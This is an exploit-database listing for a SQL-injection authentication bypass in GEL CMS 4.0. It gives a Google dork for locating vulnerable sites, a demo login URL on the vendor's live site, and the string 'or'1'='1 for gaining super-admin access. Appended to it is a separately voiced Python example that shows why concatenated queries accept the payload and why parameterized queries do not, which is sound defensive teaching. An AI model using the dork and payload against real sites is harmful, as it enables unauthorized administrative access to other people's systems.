0day Today Exploits Market and 0day Exploits Database

GEL CMS 4.0 SQL Injection Vulnerability

Author: Guillermo Garcia Marcos
Risk: Security Risk High
0day-ID: 0day-ID-22514
Category: web applications
Date added: 13-08-2014
Platform: php
ad8888888888ba           Bypass super-Admin GEL4.0
dP'         `"8b,
8  ,aaa,       "Y888a     ,aaaa,     ,aaa,  ,aa,
8  8' `8           "8baaaad""""baaaad""""baad""8b
8  8   8              """"      """"      ""    8b
8  8, ,8         ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
8  `"""'       ,d8""
Yb,         ,ad8"
 "Y8888888888P"


# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)

DEMO: http://www.oklahoma-website-design.com/login.php

Login panel:

           domain.lol/login.php

SQL string:

            Username: 'or'1'='1
            Password: 'or'1'='1
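
Why the string above is accepted by a login that builds its query by string concatenation, next to the parameterized form that rejects it. This is an added example, not code from GEL CMS or from the advisory author; the table schema, account names and function names are assumptions, and Python's sqlite3 stands in for PHP/MySQL so the block runs offline.

```python
import sqlite3

def make_db():
    """Constructed sample data; schema and accounts are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
               "username TEXT, password TEXT, role TEXT)")
    # Plaintext passwords only to keep the focus on query construction;
    # real code stores a salted password hash.
    db.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "constructed-pw-1", "super-admin"),
         ("editor", "constructed-pw-2", "editor")])
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: form input is pasted into the SQL text."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    # With the advisory's string the WHERE clause parses as
    #   username = '' OR ('1'='1' AND password = '') OR '1'='1'
    # which is true for every row, so the first account is returned.
    return sql, db.execute(sql).fetchone()

def login_parameterized(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()

def demo():
    db = make_db()
    payload = "'or'1'='1"  # the string given in the advisory
    sql, row = login_concatenated(db, payload, payload)
    print("concatenated SQL :", sql)
    print("concatenated row :", row)
    print("parameterized row:", login_parameterized(db, payload, payload))
    print("valid credentials:",
          login_parameterized(db, "admin", "constructed-pw-1"))

if __name__ == "__main__":
    demo()
```

In PHP the equivalent of the hardened form is a prepared statement (PDO or mysqli) with bound parameters.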
